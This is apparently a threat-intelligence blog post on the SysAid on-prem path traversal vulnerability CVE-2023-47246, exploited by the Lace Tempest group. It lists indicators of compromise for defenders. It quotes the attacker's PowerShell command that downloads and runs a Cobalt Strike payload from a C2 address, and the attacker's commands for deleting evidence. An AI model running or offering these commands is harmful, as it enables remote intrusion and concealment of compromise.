On November 2nd, an alarming zero-day vulnerability was identified within the SysAid on-premises software. This discovery prompted an immediate incident response, involving communications with on-premise customers and collaboration with Profero, a cybersecurity incident response firm. The vulnerability, exploited by the hacker group DEV-0950 (Lace Tempest), presents significant risks for users of affected SysAid software versions.
1. Nature and Severity of the Vulnerability in SysAid (CVE-2023-47246)
This zero-day vulnerability, a path traversal flaw leading to code execution, was exploited to upload malicious files to the SysAid Tomcat web service, granting unauthorized system access and control. CVE-2023-47246 allowed the attackers to execute malicious scripts and deploy the GraceWire trojan. Given its ability to compromise system integrity, this vulnerability is deemed highly critical.
According to the blog post written by company’s CTO Sasha Shapirov, they observed that the attacker uploaded a WAR archive containing a WebShell and other payloads into the webroot of the SysAid Tomcat web service which is ‘C:\Program Files\SysAidServer\tomcat\webapps\usersfiles\’.
The WebShell provided the attacker with unauthorized access and control over the affected system. Then, the attacker utilized a PowerShell script, uploaded to the system via WebShell, to execute a malware loader, user[.]exe on the vulnerable server, which was used to load the GraceWire trojan. The trojan is injected it into one of the following processes:
- spoolsv[.]exe
- msiexec[.]exe
- svchost[.]exe
After initial access was completed successfully, the attacker utilized a second PowerShell script to erase proves associated with his actions from the server/
2. Which Versions of SysAid Are Affected?
Systems running SysAid on-premises software are at risk, specifically versions prior to23.3.36. The vulnerability affects the software’s webroot directory, enabling attackers to deploy a range of malicious activities.
3. Is It Possible to Detect the Existence of the SysAid Vulnerability?
To ascertain if a system is vulnerable, check for unauthorized access or suspicious file uploads in the SysAid Tomcat web service’s webroot directory. Monitoring the processes like spoolsv[.]exe, msiexec[.]exe, and svchost[.]exe for unusual activities is also critical.
SOC teams should look for specific IOCs, such as unusual IP addresses, file hashes, and suspicious commands, to prevent exploitation. Monitoring PowerShell execution logs for abnormal activities and checking targeted processes for unusual behavior are vital.
File Hashes:
- user[.]exe
Hash: b5acf14cdac40be590318dee95425d0746e85b1b7b1cbd14da66f21f2522bf4d
Comment: This is the hash for the “GraceWire” malicious loader. Searching for this specific hash across your systems can help identify the presence of this loader.
IP Addresses:
- 81.19.138[.]52
Comment: GraceWire Loader Command and Control (C2) server.
- 45.182.189[.]100
Comment: Another GraceWire Loader C2 server.
- 179.60.150[.]34
Comment: Cobalt Strike C2 server.
- 45.155.37[.]105
Comment: Meshagent remote admin tool C2 server.
These IP addresses are indicative of communication with the attacker’s infrastructure. Monitoring and blocking traffic to/from these IPs can be a key part of your response.
File Paths:
- C:\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.exe
Comment: Path for the GraceWire loader.
- C:\Program Files\SysAidServer\tomcat\webapps\usersfiles.war
Comment: Archive containing WebShells and tools used by the attacker.
- C:\Program Files\SysAidServer\tomcat\webapps\leave
Comment: A flag used by the attacker’s scripts during execution.
Monitoring for changes, creations, or executions from these paths can reveal malicious activity.
Commands:
- CobaltStrike Execution:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(‘http://179.60.150[.]34:80/a’)
This PowerShell command downloads and executes a CobaltStrike listener, indicating a significant breach.
- Post-Compromise Cleanup Commands:
These commands are used by the attacker to clear traces of their presence.
Remove-Item -Path “$tomcat_dir\webapps\usersfiles\leave”.
Remove-Item -Force “$wapps\usersfiles.war”.
Remove-Item -Force “$wapps\usersfiles\user.*”.
& “$wapps\usersfiles\user[.]exe”.
- Antivirus Detections (Microsoft Defender Identifications):
Trojan:Win32/TurtleLoader
Backdoor:Win32/Clop
Ransom:Win32/Clop
The vulnerability has been actively exploited by the DEV-0950 (Lace Tempest) group, deploying the GraceWire loader and potentially other malicious tools.
4. SOCRadar’s Role in Addressing the Issue
SOCRadar can assist in tackling this vulnerability through its XTI solution, providing enhanced threat intelligence and monitoring capabilities. It aids in identifying and responding to threats related to this vulnerability effectively.
SOCRadar Company Vulnerabilities/Attack Surface Management (ASM)
The discovery of these zero-day vulnerabilities like in SysAid’s on-premise software underscores the need for vigilant cybersecurity practices. Prompt updating to the latest software version and thorough compromise assessments are imperative steps in protecting against this severe security threat.
The post Path Traversal Leading to Compromise: SysAid On-Prem Software CVE-2023-47246 Vulnerability appeared first on SOCRadar® Cyber Intelligence Inc..
Article Link: Path Traversal Leading to Compromise: SysAid On-Prem Software CVE-2023-47246 Vulnerability